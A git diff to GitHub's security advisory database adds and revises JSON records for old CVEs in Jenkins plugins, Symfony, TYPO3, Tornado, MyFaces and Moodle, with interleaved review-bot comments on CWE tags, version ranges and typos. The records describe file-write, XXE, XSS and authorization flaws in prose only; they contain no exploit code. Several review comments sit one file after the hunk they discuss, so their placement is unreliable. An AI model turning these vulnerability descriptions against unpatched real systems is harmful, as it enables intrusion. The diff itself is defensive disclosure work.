diff --git a/advisories/github-reviewed/2022/05/GHSA-86hp-xrhj-fhpq/GHSA-86hp-xrhj-fhpq.json b/advisories/github-reviewed/2022/05/GHSA-86hp-xrhj-fhpq/GHSA-86hp-xrhj-fhpq.json
index e05adce9313e4..330b1ea44d888 100644
--- a/advisories/github-reviewed/2022/05/GHSA-86hp-xrhj-fhpq/GHSA-86hp-xrhj-fhpq.json
+++ b/advisories/github-reviewed/2022/05/GHSA-86hp-xrhj-fhpq/GHSA-86hp-xrhj-fhpq.json
@@ -25,17 +25,14 @@
 "type": "ECOSYSTEM",
 "events": [
 {
- "introduced": "8.0"
+ "introduced": "8.0.0"
 },
 {
 "fixed": "8.7.27"
 }
 ]
 }
- ],
- "database_specific": {
- "last_known_affected_version_range": "<= 8.7.26"
- }
+ ]
 },
 {
 "package": {
@@ -47,17 +44,52 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "9.0" + "introduced": "9.0.0" }, { "fixed": "9.5.8" } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 9.5.7" - } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.7.27" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.8" + } + ] + } + ] } ], "references": [ @@ -65,6 +97,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-12747" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2019-12747.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2019-12747.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/TYPO3-CMS/core" @@ -73,6 +113,10 @@ "type": "WEB", "url": "https://typo3.org/cms/release-news/typo3-8-release-notes/" }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-core-sa-2019-020" + }, { "type": "WEB", "url": "https://typo3.org/security/advisory/typo3-core-sa-2019-020/" diff --git a/advisories/github-reviewed/2022/05/GHSA-8864-pwhg-3mp2/GHSA-8864-pwhg-3mp2.json b/advisories/github-reviewed/2022/05/GHSA-8864-pwhg-3mp2/GHSA-8864-pwhg-3mp2.json new file mode 100644 index 0000000000000..a613da328d51b --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-8864-pwhg-3mp2/GHSA-8864-pwhg-3mp2.json 
@@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8864-pwhg-3mp2", + "modified": "2024-01-30T22:10:25Z", + "published": "2022-05-14T03:05:26Z", + "aliases": [ + "CVE-2018-1000607" + ], + "summary": "Arbitrary file write vulnerability in Jenkins Fortify CloudScan Plugin", + "details": "A arbitrary file write vulnerability exists in Jenkins Fortify CloudScan Plugin 1.5.1 and earlier in ArchiveUtil.java that allows attackers able to control rulepack zip file contents to overwrite any file on the Jenkins master file system, only limited by the permissions of the user the Jenkins master process is running as.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:fortify-cloudscan-jenkins-plugin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.5.2" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.5.1" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000607" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-06-25/#SECURITY-870" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:10:25Z", + "nvd_published_at": "2018-06-26T17:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-89cp-fvcc-hxh7/GHSA-89cp-fvcc-hxh7.json b/advisories/github-reviewed/2022/05/GHSA-89cp-fvcc-hxh7/GHSA-89cp-fvcc-hxh7.json index c9670a67c9c64..662dd8d86bf12 100644 --- a/advisories/github-reviewed/2022/05/GHSA-89cp-fvcc-hxh7/GHSA-89cp-fvcc-hxh7.json +++ b/advisories/github-reviewed/2022/05/GHSA-89cp-fvcc-hxh7/GHSA-89cp-fvcc-hxh7.json 
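Review bot: `"cwe_ids": ["CWE-20"]` is a generic classification for what the details describe as an attacker-controlled zip whose contents overwrite arbitrary files on the Jenkins master; if the root cause is an archive entry path that is not constrained to the extraction directory, CWE-22 (path traversal) would be the more specific and more useful weakness for consumers filtering on CWE. This should be confirmed against the referenced Jenkins advisory (SECURITY-870) rather than assumed from the description. The grammatical slip "A arbitrary file write vulnerability" is inherited from the upstream CVE text and can stay if the policy is to quote NVD verbatim.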
@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-89cp-fvcc-hxh7", - "modified": "2023-08-15T23:43:12Z", + "modified": "2024-02-06T16:02:10Z", "published": "2022-05-17T05:17:45Z", "aliases": [ "CVE-2012-6432" @@ -12,6 +12,15 @@ ], "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "versions": [ + "2.2-dev" + ] + }, { "package": { "ecosystem": "Packagist", @@ -22,7 +31,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "2.0" + "introduced": "2.0.0" }, { "fixed": "2.0.20" @@ -41,7 +50,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "2.1" + "introduced": "2.1.0" }, { "fixed": "2.1.5" @@ -49,15 +58,6 @@ ] } ] - }, - { - "package": { - "ecosystem": "Packagist", - "name": "symfony/symfony" - }, - "versions": [ - "2.2-dev" - ] } ], "references": [ @@ -65,6 +65,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2012-6432" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2012-6432.yaml" + }, + { + "type": "PACKAGE", + "url": "https://github.com/symfony/symfony" + }, + { + "type": "WEB", + "url": "https://symfony.com/blog/security-release-symfony-2-0-20-and-2-1-5-released" + }, { "type": "WEB", "url": "http://symfony.com/blog/security-release-symfony-2-0-20-and-2-1-5-released" diff --git a/advisories/github-reviewed/2022/05/GHSA-8jx9-7j5m-79x4/GHSA-8jx9-7j5m-79x4.json b/advisories/github-reviewed/2022/05/GHSA-8jx9-7j5m-79x4/GHSA-8jx9-7j5m-79x4.json new file mode 100644 index 0000000000000..55095255cba07 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-8jx9-7j5m-79x4/GHSA-8jx9-7j5m-79x4.json 
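Review bot: The `"versions": ["2.2-dev"]` entry is only moved from the end of `affected` to the front, and keeps a version string that does not follow Packagist/Composer naming; a development branch is published as `2.2.x-dev` (or `dev-<branch>`), so an exact-match `versions` list with `2.2-dev` is unlikely to match anything a resolver reports. If the intent is "the unreleased 2.2 branch before the 2.0.20/2.1.5 fix", a range with `"introduced": "2.2.0-BETA1"`-style bounds, as this same commit does in GHSA-7w53-hfpw-rg3g, would be consistent; otherwise confirm the exact spelling against the FriendsOfPHP yaml now referenced. The added https form of the symfony.com blog URL duplicates the retained http entry, as noted for GHSA-83c3-qx27-2rwr.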
@@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8jx9-7j5m-79x4", + "modified": "2024-01-30T22:46:28Z", + "published": "2022-05-13T01:40:54Z", + "aliases": [ + "CVE-2017-1000089" + ], + "summary": "Jenkins Build Step Plugin fails to check Item/Build permission", + "details": "Builds in Jenkins are associated with an authentication that controls the permissions that the build has to interact with other elements in Jenkins. The Pipeline: Build Step Plugin did not check the build authentication it was running as and allowed triggering any other project in Jenkins.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:pipeline-build-step" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.5.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.5" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000089" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-07-10/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-276" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:46:28Z", + "nvd_published_at": "2017-10-05T01:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-8rc4-3jc3-83pm/GHSA-8rc4-3jc3-83pm.json b/advisories/github-reviewed/2022/05/GHSA-8rc4-3jc3-83pm/GHSA-8rc4-3jc3-83pm.json new file mode 100644 index 0000000000000..dc7f3d87baca9 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-8rc4-3jc3-83pm/GHSA-8rc4-3jc3-83pm.json 
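Review bot: The summary `"Jenkins Build Step Plugin fails to check Item/Build permission"` drops the "Pipeline:" prefix that the details and the package name `org.jenkins-ci.plugins:pipeline-build-step` both carry, which makes the one-line title ambiguous with other Jenkins "build step" plugins; `"Jenkins Pipeline: Build Step Plugin fails to check Item/Build permission"` would name the component unambiguously. `"cwe_ids": ["CWE-276"]` (incorrect default permissions) also reads oddly for a missing authorization check on the build's authentication; CWE-862 as used for the sibling GHSA-7mvg-cx9c-r6jm may fit better, subject to confirmation against the referenced Jenkins advisory.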
@@ -0,0 +1,60 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-8rc4-3jc3-83pm",
+ "modified": "2024-01-30T22:12:10Z",
+ "published": "2022-05-14T03:13:12Z",
+ "aliases": [
+ "CVE-2018-1000198"
+ ],
+ "summary": "XML External Entity processing vulnerability in Jenkins Black Duck Hub Plugin",
+ "details": "A XML external entity processing vulnerability exists in Jenkins Black Duck Hub Plugin 3.1.0 and older in PostBuildScanDescriptor.java that allows attackers with Overall/Read permission to make Jenkins process XML eternal entities in an XML document.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "com.blackducksoftware.integration:blackduck-hub"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "4.0.0"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 3.1.0"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000198"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jenkins.io/security/advisory/2018-05-09/#SECURITY-671"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-611"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T22:12:01Z",
+ "nvd_published_at": "2018-06-05T21:29:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-8vpw-mgpf-mpvv/GHSA-8vpw-mgpf-mpvv.json b/advisories/github-reviewed/2022/05/GHSA-8vpw-mgpf-mpvv/GHSA-8vpw-mgpf-mpvv.json
new file mode 100644
index 0000000000000..0d7d3180f1b21
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-8vpw-mgpf-mpvv/GHSA-8vpw-mgpf-mpvv.json
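Review bot: `"modified": "2024-01-30T22:12:10Z"` and `"github_reviewed_at": "2024-01-30T22:12:01Z"` disagree by nine seconds, while every other new advisory in this change carries identical values for the two fields; this looks like an export artefact rather than a real second edit, but it is worth checking that the exporter is not reading the two timestamps from different revisions. The details string says "XML eternal entities" where "external" is meant; that typo is presumably carried over from the upstream CVE description, and if the policy is to quote it verbatim it can stay, otherwise it should be corrected here since the summary already uses the right term.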
@@ -0,0 +1,77 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8vpw-mgpf-mpvv", + "modified": "2024-02-01T20:53:42Z", + "published": "2022-05-17T19:57:19Z", + "aliases": [ + "CVE-2014-9720" + ], + "summary": "Tornado XSRF cookie allows side-channel attack against TLS (BREACH attack)", + "details": "Tornado before 3.2.2 sends arbitrary responses that contain a fixed CSRF token and may be sent with HTTP compression, which makes it easier for remote attackers to conduct a BREACH attack and determine this token via a series of crafted requests.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "tornado" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.2.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-9720" + }, + { + "type": "WEB", + "url": "https://github.com/tornadoweb/tornado/commit/1c36307463b1e8affae100bf9386948e6c1b2308" + }, + { + "type": "WEB", + "url": "https://bugzilla.novell.com/show_bug.cgi?id=930362" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1222816" + }, + { + "type": "PACKAGE", + "url": "https://github.com/tornadoweb/tornado" + }, + { + "type": "WEB", + "url": "http://openwall.com/lists/oss-security/2015/05/19/4" + }, + { + "type": "WEB", + "url": "http://www.tornadoweb.org/en/stable/releases/v3.2.2.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-203" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T20:53:42Z", + "nvd_published_at": "2020-01-24T18:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-8wgj-6wx8-h5hq/GHSA-8wgj-6wx8-h5hq.json b/advisories/github-reviewed/2022/05/GHSA-8wgj-6wx8-h5hq/GHSA-8wgj-6wx8-h5hq.json index 590c39ecbdf87..54477a96fe1a3 100644 
--- a/advisories/github-reviewed/2022/05/GHSA-8wgj-6wx8-h5hq/GHSA-8wgj-6wx8-h5hq.json +++ b/advisories/github-reviewed/2022/05/GHSA-8wgj-6wx8-h5hq/GHSA-8wgj-6wx8-h5hq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8wgj-6wx8-h5hq", - "modified": "2023-02-22T16:58:31Z", + "modified": "2024-02-08T19:31:49Z", "published": "2022-05-13T01:05:42Z", "aliases": [ "CVE-2018-14773" @@ -128,6 +128,120 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.49" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.0" + }, + { + "fixed": "2.8.44" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.3.18" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.4.0" + }, + { + "fixed": "3.4.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, + { + "fixed": "4.0.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.1.0" + }, + { + "fixed": "4.1.3" + } + ] + } + ] } ], "references": [ 
@@ -139,6 +253,14 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/commit/e447e8b92148ddb3d1956b96638600ec95e08f6b" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/http-foundation/CVE-2018-14773.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2018-14773.yaml" + }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/03/msg00009.html" diff --git a/advisories/github-reviewed/2022/05/GHSA-92cv-wv2c-8899/GHSA-92cv-wv2c-8899.json b/advisories/github-reviewed/2022/05/GHSA-92cv-wv2c-8899/GHSA-92cv-wv2c-8899.json new file mode 100644 index 0000000000000..eb60ba5d0ccc7 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-92cv-wv2c-8899/GHSA-92cv-wv2c-8899.json 
@@ -0,0 +1,81 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-92cv-wv2c-8899", + "modified": "2024-02-08T15:50:25Z", + "published": "2022-05-17T05:50:42Z", + "aliases": [ + "CVE-2010-2086" + ], + "summary": "Apache MyFaces Cross-site Scripting vulnerability", + "details": "Apache MyFaces 1.1.7 and 1.2.8 (All previous versions are likely vulnerable), as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that involve modifying the serialized view object.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.myfaces.core:myfaces-core-module" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.1.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.myfaces.core:myfaces-core-module" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.2.0" + }, + { + "last_affected": "1.2.8" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-2086" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/myfaces" + }, + { + "type": "WEB", + "url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2010-001.txt" + }, + { + "type": "WEB", + "url": "http://www.blackhat.com/presentations/bh-dc-10/Byrne_David/BlackHat-DC-2010-Byrne-SGUI-slides.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T15:50:25Z", + "nvd_published_at": "2010-05-27T19:00:00Z" + } +} \ No newline at end of file 
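Review bot: `"severity": [ ]` is emitted as an empty array with a stray blank line inside it, while `database_specific.severity` is `"MODERATE"`; consumers that derive severity from a CVSS vector will see nothing for this advisory, so either a vector should be added or the rating should be understood as a curator assessment, and the empty array should be written as `"severity": []` on one line as a formatting nit. The same empty-array-with-blank-line shape appears in GHSA-966m-m549-2878 later in this change. The two ranges use `last_affected` (1.1.7 and 1.2.8) rather than `fixed`, which is consistent with the details stating that all prior versions are likely vulnerable and no fixed release is cited.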
diff --git a/advisories/github-reviewed/2022/05/GHSA-92x6-h2gr-8gxq/GHSA-92x6-h2gr-8gxq.json b/advisories/github-reviewed/2022/05/GHSA-92x6-h2gr-8gxq/GHSA-92x6-h2gr-8gxq.json index 2b0972df26161..9a0bbc35f7b46 100644 --- a/advisories/github-reviewed/2022/05/GHSA-92x6-h2gr-8gxq/GHSA-92x6-h2gr-8gxq.json +++ b/advisories/github-reviewed/2022/05/GHSA-92x6-h2gr-8gxq/GHSA-92x6-h2gr-8gxq.json 
@@ -15,6 +15,158 @@ } ], "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-csrf" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.38" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-csrf" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.0" + }, + { + "fixed": "2.8.31" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-csrf" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.2.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-csrf" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.3.0" + }, + { + "fixed": "3.3.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.38" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.0" + }, + { + "fixed": "2.8.31" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.2.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.3.0" + }, + { + "fixed": "3.3.13" + } + ] + } + ] + }, { "package": { "ecosystem": "Packagist", @@ -32,10 +184,7 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 2.7.37" - } + ] }, { "package": { 
@@ -54,10 +203,7 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 2.8.30" - } + ] }, { "package": { @@ -69,17 +215,14 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "3.2.0" + "introduced": "3.0.0" }, { "fixed": "3.2.14" } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 3.2.13" - } + ] }, { "package": { @@ -98,10 +241,7 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 3.3.12" - } + ] } ], "references": [ @@ -117,6 +257,18 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/commit/b4dbdd7cd8732483d585eacff3428c16b07ad15e" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security-csrf/CVE-2017-16653.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security/CVE-2017-16653.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2017-16653.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/symfony/symfony" @@ -125,6 +277,10 @@ "type": "WEB", "url": "https://symfony.com/blog/cve-2017-16653-csrf-protection-does-not-use-different-tokens-for-http-and-https" }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2017-16653" + }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4262" diff --git a/advisories/github-reviewed/2022/05/GHSA-966m-m549-2878/GHSA-966m-m549-2878.json b/advisories/github-reviewed/2022/05/GHSA-966m-m549-2878/GHSA-966m-m549-2878.json new file mode 100644 index 0000000000000..336c16f68b731 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-966m-m549-2878/GHSA-966m-m549-2878.json 
@@ -0,0 +1,109 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-966m-m549-2878", + "modified": "2024-02-07T22:35:03Z", + "published": "2022-05-13T01:13:08Z", + "aliases": [ + "CVE-2010-1616" + ], + "summary": "Moodle is vulnerable to unauthorized new accounts creation", + "details": "Moodle 1.8.x and 1.9.x before 1.9.8 can create new roles when restoring a course, which allows teachers to create new accounts even if they do not have the moodle/user:create capability.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "moodle/moodle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.8.0" + }, + { + "fixed": "1.8.12" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "moodle/moodle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.9.0" + }, + { + "fixed": "1.9.8" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-1616" + }, + { + "type": "WEB", + "url": "https://github.com/moodle/moodle/commit/55f5b2e8b84e6390c0917195d01a3b34c33ff398" + }, + { + "type": "WEB", + "url": "https://github.com/moodle/moodle/commit/5d9ab024ac9c311c84716628cce9a124173a2e8b" + }, + { + "type": "WEB", + "url": "https://github.com/moodle/moodle/commit/5e934890c9fbe28bf89362d3eb6140208b5e3464" + }, + { + "type": "WEB", + "url": "https://github.com/moodle/moodle/commit/b0ccfc5ce87f09d4df814b057f5e6820d37fdad1" + }, + { + "type": "WEB", + "url": "https://github.com/moodle/moodle/commit/d8ada21339ecc147eccaaae97678f5368ac05f8b" + }, + { + "type": "PACKAGE", + "url": "https://github.com/moodle/moodle" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-security-announce/2010-05/msg00001.html" + }, + { + "type": "WEB", + "url": "http://moodle.org/security/" + }, + { + "type": "WEB", + "url": "http://tracker.moodle.org/browse/MDL-16658" + }, + { + "type": "WEB", + "url": 
"http://www.vupen.com/english/advisories/2010/1107" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T22:35:03Z", + "nvd_published_at": "2010-04-29T21:30:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-985w-mqqp-7287/GHSA-985w-mqqp-7287.json b/advisories/github-reviewed/2022/05/GHSA-985w-mqqp-7287/GHSA-985w-mqqp-7287.json index bd91e8b81b5f5..c593acc627415 100644 --- a/advisories/github-reviewed/2022/05/GHSA-985w-mqqp-7287/GHSA-985w-mqqp-7287.json +++ b/advisories/github-reviewed/2022/05/GHSA-985w-mqqp-7287/GHSA-985w-mqqp-7287.json @@ -78,10 +78,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8120" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8120.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-9c2p-99pg-c4j9/GHSA-9c2p-99pg-c4j9.json b/advisories/github-reviewed/2022/05/GHSA-9c2p-99pg-c4j9/GHSA-9c2p-99pg-c4j9.json new file mode 100644 index 0000000000000..e85db698f8270 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-9c2p-99pg-c4j9/GHSA-9c2p-99pg-c4j9.json 
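Review bot: `details` says "Moodle 1.8.x and 1.9.x before 1.9.8", but the affected block records a separate 1.8 fix at `"fixed": "1.8.12"` that the text never mentions, so a reader of the description alone would conclude the 1.8 branch has no fixed release. Suggest `"details": "Moodle 1.8.x before 1.8.12 and 1.9.x before 1.9.8 can create new roles when restoring a course, ..."`, assuming 1.8.12 is the correct fix per the referenced commits. The `severity` array is empty and split across a blank line while `database_specific.severity` is MODERATE; if no CVSS v3 vector exists for this 2010 CVE, a single-line `"severity": [],` reads clearer. Every new file in this diff (this one and the GHSA-9c2p, 9hh2, 9hv8, 9hw3, 9jrh, 9r7f, 9rx5, 9xg7, c3r5, c3wf and c73w files) lands with `\ No newline at end of file`; a trailing newline is conventional for JSON kept under version control.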
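Review bot: The added live `https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update` reference sits directly above the existing web.archive.org capture of the same URL; the archived copy was presumably recorded because the live page had stopped resolving, so the new entry may be a dead link. Worth checking that the URL still resolves before merging, and keeping only one of the two if it does. The same pair is added in the GHSA-9wr9 and GHSA-c4r2 hunks.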
@@ -0,0 +1,64 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9c2p-99pg-c4j9",
+ "modified": "2024-01-30T22:35:50Z",
+ "published": "2022-05-17T00:29:01Z",
+ "aliases": [
+ "CVE-2017-1000102"
+ ],
+ "summary": "Persistent XSS vulnerability in Static Analysis Utilities",
+ "details": "The Details view of some Static Analysis Utilities based plugins, was vulnerable to a persisted cross-site scripting vulnerability: Malicious users able to influence the input to these plugins, for example the console output which is parsed to extract build warnings (Warnings Plugin), could insert arbitrary HTML into this view.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
